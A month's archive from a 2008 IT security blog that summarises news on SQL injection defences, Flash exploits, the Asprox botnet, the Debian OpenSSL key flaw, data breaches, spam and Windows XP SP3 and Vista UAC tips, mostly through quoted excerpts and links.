May 2008 - Posts
Microsoft has recently published a series of best practices to help developers build SQL code that is not susceptible to SQL injection attacks.
SQL injection attacks occur in applications that are poorly programmed. They are not a result of failures in the data base or supporting products. When applications do not properly filter and control input data, there is a chance inputs can be manipulated, so that dangerous redirecting scripts may end up on the website
Once a web site is infected, the newly embedded script will then direct users to another dangerous website, that can automatically download malware on the user's PC. While these attacks have been around for years, malware authors are now using newly automated approaches to find susceptible servers automatically and infect thousands of websites in a single day.
IT developers have an inherent responsibility to protect the privacy and integrity of customer information. These articles are "must reads" for any IT developer, for greater assurances in building secure applications.
Microsoft Best Practices for preventing SQL Injection Attacks
Microsoft Security Vulnerability Research & Defense Blog - SQL Injection Attack
http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx
Nazim's IIS Security Blog - Filtering SQL injection from Classic ASP
http://blogs.iis.net/nazim/archive/2008/04/28/filtering-sql-injection-from-classic-asp.aspx
Neil Carpenter's Blog - SQL Injection Mitigation: Using Parameterized Queries
http://blogs.technet.com/neilcar/archive/2008/05/21/sql-injection-mitigation-using-parameterized-queries.aspx
http://blogs.technet.com/neilcar/archive/2008/05/23/sql-injection-mitigation-using-parameterized-queries-part-2-types-and-recordsets.aspx
Michael Howard’s Blog -Giving SQL Injection the Respect it Deserves
http://blogs.msdn.com/sdl/archive/2008/05/15/giving-sql-injection-the-respect-it-deserves.aspx
MSDN Article - Preventing SQL Injections in ASP
http://msdn.microsoft.com/en-us/library/cc676512.aspx
Anti-Malware Engineering Team - When SQL Injections Go Awry, Incident Case Study
http://blogs.technet.com/antimalware/archive/2008/05/30/when-sql-injections-go-awry-incident-case-study.aspx
A more general overview of SQL Injection attacks can also be here:
What are SQL Injection Attacks?
http://en.wikipedia.org/wiki/Sql_injection
During April, a hacking contest took place where Vista's security was compromised through Flash, rather than a weakness in it's own security controls. As I don't have Flash installed on any of the complementary browsers I use (e.g., Firefox, Opera), I've been getting along without Flash in these environments fine. I then reviewed the IE security options and found an easy way to easily disable or enable Flash as desired. This specific approach doesn't work with IE 6 or earlier versions.
Currently, a new massive attack has been launched where malicious SWF objects have been seeded on thousands of web sites (one estimate was that 250,000 web pages were infected). Most of the current attacks can be stopped by moving to the latest version of Flash (9.0.124). However AVERT and other AV vendors still investigating whether new exploits are being crafted that could possibly infect up-to-date systems.
The instructions below show how you can temporarily disable Flash until there's certainly all possible exploits have been patched. As I like the setting to avoid Flash based advertising, I usually keep it set that way and turn it on occassionally when it's truly needed.
IE Settings - Disable/enable add-in services (e.g., Flash)
Tools >>> Internet Options >>> Program Tab >>> Manage add-on options button >>> Filters >>> Add-ons that run without requiring permission >>> Select Shockwave Object >>> Click Disable button at bottom
To re-enable Flash, all you need to do is follow the steps in green above and select Enable button in last step. If desired, you can also disable Adobe PDF Reader and Windows Media Player from starting within IE. They will still work properly in starting outside of IE if desired. As the settings work like the Flash process noted in green above, these services can also be toggled back on if needed.
CAUTIONARY NOTES IN SETTINGS ABOVE:
1. Avoid making these changes unless you are familiar with IE settings and understand the technical steps noted in green.
2. Avoid setting off other services as it could affect or break browser functions.
3. Flash might be used often in an email website or forum you might be posting frequently to, and the warning message could appear often.
4. The technical settings were specifically for IE 8 and they should work for IE 7.
Hopefully, the tapes were misplaced rather than stolen for the purposes of identity theft or fraud.
Bank of New York Mellon loses tapes with data on 4.5M clients
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9091318&source=NLT_PM&nlid=8
QUOTE: May 30, 2008 (Computerworld) Bank of New York Mellon Corp. officials last week confirmed that a box of unencrypted data storage tapes holding personal information of more than 4.5 million individuals was lost more than three months ago by a third-party vendor during transport to an off-site facility.
The bank informed the Connecticut State Attorney General's Office that the tapes belonging to its BNY Mellon Shareowner Services division were lost in transport by off-site storage firm Archive America on Feb. 27. The missing backup tapes include names, birth dates, Social Security numbers, and other information from customers of BNY Mellon and the People's United Bank in Bridgeport, Conn., according to a statement by Connecticut Attorney General Richard Blumenthal.
Security sites are warning of increased dangers of malformed Shockwave Flash (SWF) objects. I've read reports of possibly 250,000 web pages hosting this new exploit. It is important to move to the latest version of Flash if prompted or manually update if you are not on version 9.0.124.
Adobe test site which will show latest version (should be 9.0.124)
http://kb.adobe.com/selfservice/viewContent.do?externalId=tn_15507
How to manually update if needed (be sure to uncheck Google Toolbar)
http://www.adobe.com/products/flashplayer/
AVERT reports that recent sites affected by mass hacking attacks are being redirected to load malicious SWF files. These exploits are being programmed for specific versions of Flash to broaden the scope of attacks. Finally, please see last AVERT link (05/28), as they are researching a new variant that might possibly exploit Flash where it is fully up-to-date (e.g., 9.0.124).
Adobe Flash Player Flaw - Massive Exploitation reported
http://www.frsirt.com/english/
QUOTE: Adobe Flash Player Flaw Massive Exploitation -- The Adobe Flash Player vulnerability which was disclosed this week by Symantec and believed to be unknown (zero-day) is a previously known issue that was patched with version 9.0.124.0. Multiple compromised web pages are currently exploiting this flaw and distributing malware.
ADDITIONAL LINKS
http://www.frsirt.com/english/advisories/2008/1158
http://isc.sans.org/diary.html?storyid=4474
http://secunia.com/advisories/30404/
http://www.securityfocus.com/bid/29386
http://www.avertlabs.com/research/blog/index.php/2008/05/27/flash-player-exploit-update/
QUOTE: Here’s a quick update to the earlier post on a new unpatched Adobe Flash vulnerability. Through looking for sites serving these SWF exploits we’ve found a connection with recent mass hacks. Hacked sites reference an external script, just as they have for quite some time. But, the external scripts now reference an SWF file.
New variants emerging - AVERT researching claims that currently patched systems may be vulnerable?
http://www.avertlabs.com/research/blog/index.php/2008/05/28/flash-player-exploit-update-2/
QUOTE: At first, this appeared to close the case, but there was a report of a patched version of Flash falling victim to one of these attacks, and we’ve seen an SWF file referencing a missing file named WIN 9,0,124,0i.swf, which also suggests that the latest version of Flash is the target of that file.
I listen often to Kim Komando's talk show and found today's Tip of the Day newsletter offered a lot of practical advice on buying a new PC, as well as an easy-to-understand overview of the latest micro-processor developments.
http://www.komando.com/
http://www.komando.com/tips/categories.aspx?cat=43
Picking a microprocessor
It's time to move up from my old Intel Pentium 4, 3GHz system. Where can I learn about what's out there? Dual Core? Dual Quad? I need a simple explanation about these processors.
A lot has happened since your microprocessor was introduced. The 3GHz Pentium 4 goes back about five years. That qualifies as an eon in computers.
For most people, that old Pentium 4 would still be adequate. Today's cutting edge chips are running far in front of consumer software. So, unless you're editing lots of video or playing the most demanding games, you don't need to worry about the chip. Today's chips are more advanced than your Pentium. As you point out, they have multiple cores. They are also 64-bit chips, while yours is 32-bit. The architecture of these things is just brilliant. But most of it is going unused.
Let's start with the cores, since you mentioned them. Each core is its own little processor. Both Intel and AMD are producing multi-core chips. The most advanced Intel chips have four cores. AMD had the chip lead at one time. But it struggled with its quad core chips. It did finally get them out, well after Intel. Quad-core chips work well on servers. But they are overkill in the consumer space. A quad core gives you one thing—bragging rights.
Windows is capable of running on multiple cores. So it can take advantage of these advances. But few consumer programs use more than one core. In fact, porting consumer programs to multiple cores is a huge concern. The same type of thing applies to 64-bit chips. This number refers to the amount of data a core can crunch at once. AMD and Intel chips now are 64-bit. That's pretty meaningless, though. Practically everything else is 32-bit.
True, you can get a 64-bit version of Windows Vista. But I don't recommend that. You would probably discover that drivers are hard to find. That would mean that certain peripherals couldn't be used. You could probably get by with Intel's Celeron, or AMD's Sempron. Both are budget microprocessors. But you can't be sure of what the future will bring. So I would go with an Intel Core 2 Duo or AMD Athlon X2. If future programs use dual-core technology, you'll be ready. You might see high-end computers with Intel Extreme or AMD Phenom chips. Those are very powerful. They should work well in gaming and video-editing situations. Otherwise, you can't use the power.
I assume you'll be buying Windows Vista. You will see one of four versions. I have a chart that explains them. There is a fifth version—Enterprise. You won't see that in stores. Vista is more capable than its predecessor, XP. Consequently, its video requirements are pretty stiff. Get a minimum of 128 megabytes of video RAM. Go for 256MB, if you have room in your budget. I prefer a separate video card. But integrated graphics will also work. I have a tip that explains this further. Don't overload your system with random access memory. I recommend 2 gigabytes. If you need more, go up to 3GB. Over that, and you're probably just throwing your money away.
Windows Vista UAC Controls - Tame it without turning it off
Vista User Access Controls (UAC) may be doing too good of job at times as it's designed to provide safety warnings. This warning system is designed to prompt for an administrative password anytime icons or scripts containing the shield icon are invoked. This article from Information Week is excellent and shares some techniques to tailor UAC so that it still properly warns but less often on the common day-to-day tasks.
Information Week: How To Tame Microsoft Windows Vista's UAC
http://www.informationweek.com/news/windows/operatingsystems/showArticle.jhtml?articleID=207801611
QUOTE: Are all those Windows Vista User Account Control warnings driving you nuts? Here are seven ways to make Vista's UAC less intrusive, while keeping legitimate security threats at bay. It's tempting to just turn off UAC and be done with it, but I'm not convinced this is a worthwhile solution. There are times when you'll want the protection that UAC affords, and there are ways you can make UAC a lot friendlier and less intrusive. Work with it rather than against it, and you may be pleasantly surprised at how manageable it really is.
BRIEF SUMMARY OF SEVEN UAC RECOMMENDATIONS
1. Slow An Overzealous UAC (tailor the circumstances UAC dialogs should and should not show up)
2. Use Process Explorer (use of this optional tool from Systems Internal)
http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
3. Schedule A Task To Run As Admin (set up common pre-existing applications to bypass UAC)
http://www.informationweek.com/news/windows/operatingsystems/showArticle.jhtml?articleID=207801611&pgno=3
4. Use UAC's "Quiet Mode (require advanced registry to set up common pre-existing applications for bypass) UAC)
5. Turn Off The Secure Desktop (The visual screen darkening and normalization after accepting may consume a few seconds. Turing this off on older equipment may make UAC more acceptable)
6. Tighten Up UAC's Control (It may also be desirable for Admins to supply passwords for UAC prompts)
7. Enforce Running Signed Code (Another strengthening measure is to ensure only signed code is run which can safeguard against malware; but as a caution there are many legitimate programs that execute unsigned code)
While the Storm worm botnet continues to spread using email techniques, SQL injection techniques are starting to be used as an approach to seed malware on vulnerable computers. Folks should be careful with email in avoiding all attachments and website links, and stay up-to-date on security patches and AV protection.
Storm Worm - New Version uses SQL Injection Techniques
http://blogs.zdnet.com/security/?p=1131
http://ddanchev.blogspot.com/2008/05/all-you-need-is-storm-worms-love.html
QUOTE: What has changed compared to previous campaigns? Storm Worm is back in the SQL injection attack phrase, with a malicious iframe injected at a small number of sites for the time being. Moreover, assessing the storm worm infected hosts can only be done if you spoof your browser UI, otherwise you will get no indication for any kind of malicious activity going on. Furthermore, despite that there are no exploits used at the infected hosts but, a heavily obfuscated HTML was detected in their injected domain which would load automatically upon someone visiting an already injected site.
This Information Week article provides an excellent overview of Identity Theft monitoring services. As more than 225 million records have been breached since 2005, this article describes what these firms can and cannot do for their customers. A list of low-cost and free methods of protection are also provided:
ID Theft Monitoring Services: What You Need To Know
http://www.informationweek.com/news/security/privacy/showArticle.jhtml?articleID=207501091
QUOTE: Take identity theft monitoring service providers. The pitch? Give us your Social Security number and notification of suspicious identity activity is only an e-mail alert or phone call away. These services, which typically cost $10 to $20 per month, offer to guard your identity by monitoring the three credit-reporting agencies (Experian, Equifax, and TransUnion), cell phone applications, government databases, and public information. Some also provide insurance (subject to underwriting, and not valid in every state) to help defray costs associated with recovering from identity theft cases.
Monitoring helps with identity theft by actively watching for fraud in your name. "The credit monitoring service notifies you at an earlier stage than you might otherwise know about the fraud, because otherwise it could be months before someone potentially finds out about it," says Paul Stephens, director of policy and advocacy at PRC.
Monitoring, however, won't stop identity theft outright. "With credit monitoring, your report is still potentially seen by people who want to commit fraudulent acts against you," he says. "You'll get an early warning, but you haven't actually prevented them from using the report." At this point, it's also too late to freeze your credit, which prohibits anyone but current creditors from seeing a credit report. This means your personal data is already at large, and may have been used to gain a credit card, cell phone, or even mortgage in your name.
Below are some low-cost and free ways to better protection the use of your identity:
Five Mostly Free Alternatives to ID Theft Monitoring Services
http://www.informationweek.com/news/security/privacy/showArticle.jhtml?articleID=207501091&pgno=4
SUMMARY OF FREE OR LOW-COST RECOMMENDATIONS
1. Watch your credit reports. Everyone is entitled to see a free credit report annually from each of the three credit-reporting agencies (Experian, Equifax, and TransUnion). To obtain yours, see:
http://www.annualcreditreport.com
2. Use credit freezes. A credit freeze (aka "security freeze") locks credit reports so only you or current creditors can see it. It can also be unlocked on a per-creditor basis, for example if you're going to buy a house, car, or get a new credit card. The cost is $10 per bureau to place a freeze and $10 to lift a freeze
3. Place fraud alerts. Under the Fair Credit Reporting Act, consumers may place a fraud alert on their credit report for 90 days -- renewable indefinitely
4. Avoid debit cards. Attacks which steal card numbers via ID-swiping devices -- often installed at gas stations and grocery stores -- are on the rise.
5. Look to resolution services. Public agencies and non-profit organizations can help you clean up identity theft for free.
Daily, I'm receiving numerous copies of "gas spam". These messages typically claim a savings of 70 cents per gallon if you subscribe to the special product or solution.
Folks must avoid selecting any links in spam messages to avoid any potential for spyware or viruses. This includes even opting out of future emails. Spammers rarely honor opt out requests, and it actually validates they have an active clean email address.
The best practice is to line all these messages up in the in-box and delete them without opening them. There are no free lunches on the Internet. Always avoid email messages where claims are made that seem too good to be true.
Gas Spam Emerges - Can you really save 70 cents per gallon?
http://www.avertlabs.com/research/blog/index.php/2008/05/09/gas-spam/
QUOTE: In my role as an anti-spam researcher I get to see a lot of spam. Most of the spam I see can be categorized into a fairly small range of spam types. Common examples include pharmacy, stock and watch spam. Over the last few weeks I have seen a new type of spam. This is spam which is trying to sell a product to save money on gas.
As recommended, these keys should be regenerated for better protection after applying the latest release. The links below can help explain some of the key issues:
INFOCon yellow: update your Debian generated keys/certs ASAP
http://isc.sans.org/diary.html?storyid=4421
QUOTE: Scripts that allow brute forcing of vulnerable keys (see this as rainbow tables for SSH keys) are in the wild so we would like to remind all of you to regenerate SSH keys ASAP. Please keep in mind that SSL certificates should be regenerated as well. This can be even more problematic if you had your certificates signed since you'll have to go through this process again (and possibly pay money again).
Update 2310 UTC: The new Debian package for SSH (ssh_4.3p2-9etch1) also applies a package called "openssh-blacklist". After this update, your SSH server will refuse keys from the compromised set. The package also installs a new tool called "ssh-vulnkey" that can help in hunting down key files that contain weak keys. Note that in combination with the existing ssh-keyscan, ssh-vulnkey can be used to easily identify servers that use weak host keys, so while these Debian patches help those who patch, they also make attacks easier against those who did not yet patch.
Additional Links
http://www.pcmag.com/article2/0,2817,2305554,00.asp
http://www.avertlabs.com/research/blog/index.php/2008/05/16/code-cleanup-gone-wrong/
H.D. Moore's Analysis
http://metasploit.com/users/hdm/tools/debian-openssl/
QUOTE: But the bug introduced by Debian effectively reduces the strength of the key to 32768 permutations, which is 16 bits. Famed security researcher HD Moore has actually already pre-calculated all of the potential keys for the most common cases. It took mere hours. So now you can be hacked even without someone brute-forcing your encryption.
A small botnet known as Asprox has been used in password stealing, spam, and phishing attacks. This week Asprox was modified to include a new SQL Injection tool. As recently shared, SQL injection attacks are more reflective of poorly programmed Internet web pages, rather than vendor product vulnerabilities.
This new botnet based attack is innovative. It interfaces with Google's search engine to locate vulnerable web pages. When a weakness is found, Asprox injects an iFrame based redirectional link on the vulnerable website. Later folks who visit the newly seeded web page, may download and install malicious code automatically on their PC and join the Asprox botnot.
It's always important to stay up-to-date on security patches and AV protection, as this could help prevent an infection if folks accidently visit a malicious website.
Asprox Botnet Installs SQL Injection Tool
http://www.secureworks.com/research/threats/danmecasprox/
http://vil.mcafeesecurity.com/vil/content/v_137684.htm
http://www.eweek.com/c/a/Security/Botnet-Installs-SQL-Injection-Tool/
http://www.scmagazineus.com/Asprox-botnet-malware-morphs/article/110169/
http://news.idg.no/cw/art.cfm?id=E9210D49-17A4-0F78-31AA26FE725B1F22
QUOTE: Danmec is a password-stealing trojan which has been around for a couple of years, but in the last year new components have been introduced by the author, turning it into a more complete crimeware family. One of these components (developed last year) is the Asprox trojan, which is designed to create a spam botnet which appears to be solely dedicated to sending phishing emails. As of yesterday, we observed the Asprox botnet pushing an update to the infected systems, a binary with the filename msscntr32.exe. The executable is installed as a system service with the name "Microsoft Security Center Extension", but in reality it is a SQL-injection attack tool.
After the Asprox botnet seeds its bots with the msscntr32.exe file, the attack tool launches and uses Google 's search engine to find potentially-vulnerable pages. It then hits those pages with a SQL-injection attack and, if successful, plants a malicious IFRAME on the site.
Visitors are redirected through a series of malware-hosting servers that try one or more exploits to crack the PC. If that works, a Trojan horse is downloaded and installed on the PC, adding it to the Asprox botnet; those compromised PCs are then used to spew more phishing spam.
Stewart has counted 1,000 sites that have been hacked by the SQL-injection attack tool since Monday night. The sites include small business sites, domains for several small colleges and universities and some hosted by law firms. Most are in the U.S.
While HP is working on a solution for the flawed IntelPPM driver used for certain AMD models, this neat solution will check for the presence of vulnerable PCs and disable the driver so that Windows XP SP3 can successfully load.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9085978
https://msinfluentials.com/blogs/jesper/archive/2008/05/08/does-your-amd-based-computer-boot-after-installing-xp-sp3.aspx
QUOTE: May 15, 2008 (Computerworld) A former Microsoft Corp. security manager has published a tool designed to detect and fix PCs that may be susceptible to "endless reboots" if updated to Windows XP Service Pack 3 (SP3).
Jesper Johansson, once a program manager for security policy at Microsoft and currently an MVP (Microsoft Most Valuable Professional) who works at Amazon.com, posted a link to the tool on his blog yesterday, beating his former employer and Hewlett-Packard Co. to the draw. Neither company has yet come up with a fix or patch for the weeklong snafu.
Johansson's small, 16K VBScript (Visual Basic Scripting Edition) file checks whether the PC is running a processor from Advanced Micro Devices Inc. (AMD), and if so, examines the Windows registry to see if a device driver meant for Intel-based machines is set to load.
"If it is, it will offer you an option to disable it," said Johansson in an update to a blog post where he has been summarizing reports of Windows XP SP3 problems and offering solutions. Users can run the script from the command line to check multiple machines on a network, Johansson added.
This is EXCELLENT advice, as this process is often neglicated due to the need to start the next project right away.
Article: 10 things you should do near the end of a project
http://blogs.techrepublic.com.com/10things/?p=351
QUOTE: In either case, you probably go through the typical inception, elaboration, and construction phases of a project. But when it comes to the end of a project, many project managers come up just short of the finish line. Failure to handle the final steps can add confusion to an initiative and may lead to customer dissatisfaction, unhappy staff, and a project dragging on longer than necessary.
#1: Finalize testing
#2: Finalize training
#3: Validate deliverables
#4: Get project signoff
#5: Release the team
#6: Analyze actual vs. planned
#7: Archive documentation
#8: Ensure contract closure
#9: Conduct a postmortem meeting
#10: Perform a self assessment
As noted in the article, there are both advantages and disadvantages to using free security sofware instead of a purchased security suite. Personally, I like using some of the freely available tools as they are efficient and as protective as competing products that require purchase.
Still, folks should do their homework and ensure any free products will meet their needs. They should research free product offerings to understand what they will and will not be able to do functionally with these tools.
ADVANTAGES OF FREE SECURITY PRODUCTS
-- Free product offerings are better than having no protection at all (especially for folks on a tight budget)
-- There are actually many great free firewalls, AV products, and anti-spyware tools available (some free products are often as good or better than competing paid products - but you have to do your homework)
-- Sometimes a simple "no frills" solution is all you need and it might even offer better performance than a full featured product offering lots of "whistles and bells"
-- You can try adding a new layer of protection and if you find there's not a compelling need you can uninstall it and it hasn't cost you any money (e.g., if you rarely get spyware and wanted to test out a free product offering)
DISADVANTAGES OF FREE SECURITY PRODUCTS
-- Security suites may cover more areas of exposure for improved protection (so there are no gaps)
-- Some free products may not be as comprehensive in their scope of protection when compared to paid products (e.g., AV protection may be limited to just files and may not cover exploits, rootkits, or other risks)
-- Some free security products may try to upsell folks with occasional popup messages to the more comprehensive paid versions
-- Very limited user support may be available, where full technical support may be available for
-- Most free products are only available for personal use and these must not be used on a free basis in a corporate environment
Below is an analysis of some of the most recent product offerings. Both AVG and Avast have been well rated as basic AV products. They often provide protection for leading edge threats more quickly than even some of the mainstream solutions.
PC Magazine - Updated list of Free Security Software
http://blogs.pcmag.com/securitywatch/2008/05/free_security_software.php
http://www.pcmag.com/article2/0,1759,2304349,00.asp
QUOTE: Sometimes free security is worth what you pay for it. But if you know what to look for, you can get a an excellent buy when it comes to protecting yourself—without dropping a lot of cash. You may be better off with a full-scale commercial Internet security product, but you're far better off with a free product than with no security product at all. You may be surprised at how much protection you can get at no cost. The latest versions of the popular free antivirus products from avast! and AVG both now include spyware protection as well, and they're quite effective.
SPECIFIC PRODUCTS REVIEWED INCLUDE
==================================
avast! antivirus 4.8 Home Edition
AVG Anti-Virus Free 8.0
Spybot Search & Destroy 1.5
Spyware Terminator 2.0
ThreatFire 3.5
This is an interesting article as the majority of the thefts were conducted using non-technical approaches. Folks should be careful in storing or discarding sensitive documents as criminals will use any means to steal from others 
US Attorney seeks 5 years for the Bonnie and Clyde of ID theft
http://blogs.pcmag.com/securitywatch/2008/05/us_attorney_seeks_5_year_terms.php
http://www.philly.com/inquirer/home_top_left_story/20080513__Poster_children__for_ID_theft.html
QUOTE: While they used professional Internet tools to facilitate some of these thefts, the bulk of their identity theft was low-tech: "Purse snatching, burglarizing apartments and mailboxes with stolen keys, breaking into gym lockers, soliciting information over the telephone by false pretenses, picking up documents while visiting." With what they obtained they ran down others' credit cards, established new ones in the victims' names and ran those down, created accounts with banks and spent from those. They transferred a lot of money around to cover tracks.
The moral, other than that some people have no morals, is that online identity theft isn't the only way you can get ripped off. It may not even be the most likely way. Keep an eye on other vehicles, like what's in your mailbox or purse.
The XP SP3 installation upgrades have worked well for me on three systems and they should for most users. A service pack represents a major upgrade of operating system or product binaries and should be performed in a cautious manner.
Some best practices for a successful installation of XP SP3 (or any major software install) include:
-- Read the Internet Explorer prerequisite information (e.g., IE 6 and IE 8 users are affected -- IE 8 must be uninstalled first and IE 6 users will return to IE 7 if they choose to uninstall XP SP3 later)
-- The "standalone" version for professionals is a huge download (312MB). I had 3 PCs to update and that made it beneficial to use the full version (plus I wanted to archive this as a future backup). For just a single PC, the Windows Update facility provides a more efficient download as it only retrieve only the SP components needed based on the PC configuration.
-- Once you're ready to install, reboot your system for a fresh start
-- Shutdown all possible applications that automatically start-up
-- Disable your Anti-virus software
-- Optional, you may want to temporarily disconnect from the Internet on home PCs to avoid any potential interruptions (only if you're using the standalone version)
-- XP SP3 requires considerable disk space (1GB or more of free space needs to be available). Make certain you have enough free temporary space. If your hard drive is almost full, use the disk clean-up tool and delete all unneeded items.
-- Start the XP SP3 install process and read/accept the various prompts offered
-- Do not use your system for any other activity while it's running
-- Be patient as the update process could require 30 to 60 minutes depending on system speed, free space, and other factors
-- Reboot your system as prompted
-- After the final settings have been made following the reboot, I usually perform an additional reboot to test out the change and to give the PC a fresh start after applying the service pack.
It's important to read and research all prerequisites prior to installing. For example, as I'm currently testing Internet Explorer 8 beta, I discovered it must uninstalled before you can apply the XP SP3 upgrade. After XP SP3 is installed IE 8 was reinstalled.
Internet Explorer Prerequisites - A must read for XP SP3
http://blogs.msdn.com/ie/archive/2008/05/05/ie-and-xpsp3.aspx
Excellent resource for Windows XP SP3 links and information
http://www.wilderssecurity.com/showthread.php?t=208460
Microsoft Forums - XP SP3 issues can be reviewed or reported here:
http://forums.microsoft.com/TechNet/ShowForum.aspx?ForumID=2010&SiteID=17
Other XP SP3 Issues - A few systems have experienced constant reboot issues
http://msinfluentials.com/blogs/jesper/archive/2008/05/08/does-your-amd-based-computer-boot-after-installing-xp-sp3.aspx
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9084418
May 13, 2008 Update: The following blog entry provides an excellent overview of most current issues:
Shaun Cassells Blog - Some XP SP3 Users Experience Crashes, Mostly Due to OEM Problems
http://myitforum.com/cs2/blogs/scassells/archive/2008/05/12/some-xp-sp3-users-experience-crashes-mostly-due-to-oem-problems.aspx
QUOTE: While Windows XP is receiving some bad press due to the crashes, again, it appears that most of the crashes are due to hardware issues stemming from unsupported configurations, and thus the blame fall largely to the PC manufacturers, and the makers of component drivers. Fortunately, the majority of the problems have easy fixes that do not even requiring uninstalling the Service Pack.
Similar problems occurred with Windows Vista SP1, though in that case the blame ended up resting with a Microsoft pre-install update. It is fairly typical for a Service Pack to take some computers out of commission, particularly one for an OS with as large an operating base and as varied a hardware environment as Windows XP. Nonetheless, such problems are serious concerns for users affected, and those potentially at risk.
Spam email started circulating 30 years ago. Below is a good overview from the updated verson of templeton's 25th anniversary post. Spam remains a major problem with email today and folks should always be careful in avoiding taking any actions other than deleting it.
http://www.templetons.com/brad/spam/spam25.html
QUOTE: In fact, the earliest documented junk e-mailing I've uncovered was sent May 3, 1978 -- 25 years ago this month. (It was written May 1 but sent on May 3.) And in a surprising coincidence (*), just a month ago marked the 10th anniversary of March 31, 1993, the first time a USENET posting got named a spam
The DEC marketer, Gary Thuerk, identified only as "THUERK at DEC-MARLBORO" (There were no dots or dot-coms in those days, and the at-sign was often spelled out) decided to send a notice to everybody on the ARPANET on the west coast. In those days there was a printed directory of everybody on the Arpanet which they used as source for the list. The message trumpeted an open house to show off new models of the Dec-20 computer, a foray into larger, almost mainframe-sized systems.
This was a spam, though the term would not be used to refer to it for another 15 years. Thuerk had his technical associate, early DEC employee Carl Gartley, send the message from his account after several edits. Alas, at first he didn't do it right. The Tops-20 mail program would only take 320 addresses, so all the other addresses overflowed into the body of the message. When they found that some customers hadn't got it, they re-sent to the rest.
More on the History and Types of SPAM
http://en.wikipedia.org/wiki/E-mail_spam
While this is more applicable to home users, I haven't seen a threat rated as MEDIUM for a while. This one is apparently circulating extensively. It appears to affect folks participating on P2P networks, which are always dangers with respect to malware and copyright concerns.
All users need avoid the site: fastmp3player (dot ) com
Avert Medium Threat Advisory -- Fake MP3 malware attacks
http://www.avertlabs.com/research/blog/index.php/2008/05/06/fake-mp3s-running-rampant/
http://www.avertlabs.com/research/blog/index.php/2008/05/07/yet-even-more-fake-media-files/
http://blastmagazine.com/2008/05/mcafee-identifies-downloader-uah-first-medium-risk-malware-in-three-years/
http://vil.nai.com/vil/content/v_144503.htm
QUOTE: Detection of a trojan named Downloader-UA.h was added to the McAfee DAT files several days ago. Since that time more than 360,000 McAfee VirusScan Online users have reported detections, a whopping 32% of those reporting in the past 24 hours alone. Now Downloader-UA.h is not your everyday trojan, this detection covers fake music and video files associated with *** MALIOUS URL REMOVED ***
When a user attempts to load one of these MP3 and MPG files, they don’t get the music/video they were hoping for; instead they’re directed to download a file named PLAY_MP3.exe. In fact, the MP3/MPG file they downloaded was completely fake, playing no media clip what so ever.
A new series of these continuing attacks have been sent to company executives. While they appear to be authentic, the BBB, government agencies, or banks never perform official business via email (or when in doubt, always call the sender first to ensure it's from them)
BBB Case #947344536
http://www.f-secure.com/weblog/archives/00001431.html
QUOTE: We're seeing some new BBB trojan attacks going around. This attack method is well-known and has been occurring for months: A high-level executive inside an organization receives an e-mail that mentions a complaint supposedly made to the Better Business Bureau (USA). The e-mail appears to be credible and links to a site in order to download the complaint. The download claims to require IE and ActiveX in order to succeed. Once ActiveX is enabled, the sites drops a backdoor on the system. This would be fairly convincing to most recipients, especially since the real company and individual names are used.
Example of the new email scam
http://www.f-secure.com/weblog/archives/bbb0.png
Microsoft recently introduced it's new SteadyState facility, which can capture all relevant configuration settings as of a specific point-in-time to create a "gold image" copy of the system. This facility can be helpful for libraries, colleges, and even certain work settings where a standardized and locked-down system image can rolled out in a consistant manner to several workstations.
It may be desirable for home users, (especially where multiple accounts are used by different members of the family). It is also useful as an recovery method, when problems occur where users can bring back the complete "gold image" in a much more comprehensive manner than the System Restore function currently permits.
Windows XP - SteadyState Facility
http://isc.sans.org/diary.html?storyid=4367
QUOTE: Ever wish your Windows XP computer could return the way it was when it worked correctly? That would be great, right? We can all recall some point when a particular system worked just right. Enter a utility from Microsoft that does just that, and more than a 'System Restore'. It is called SteadyState and it can retain a golden image and revert to that state at will. It is designed to lock down shared computers that do not have a full time sysadmin, however it can be used in a number of scenarios. VMs are not always the environment of choice for malware researchers for example.
Microsoft Windows -- SteadyState Information
http://www.microsoft.com/windows/products/winfamily/sharedaccess/default.mspx
http://www.microsoft.com/windows/products/winfamily/sharedaccess/whatis/default.mspx
QUOTE: Windows SteadyState, successor to the Shared Computer Toolkit, is designed to make life easier for people who set up and maintain shared computers.
An easy way to manage multiple users -- You can manage whole groups of users as single user accounts. The new Windows SteadyState console makes it easier than ever to create and modify user profiles.
A locked-down platform for stable shared computing -- Not every computer user should have access to every software capability. Your system can be more stable and consistent when you limit user access to control panel functions, network resources, and other sensitive areas.
Set it and forget it -- Once you have everything set up the way you want it, you can share the computer and rest easy. Any changes a user might make to the configuration or hard disk can be undone by simply restarting the machine.
More Posts
Next page »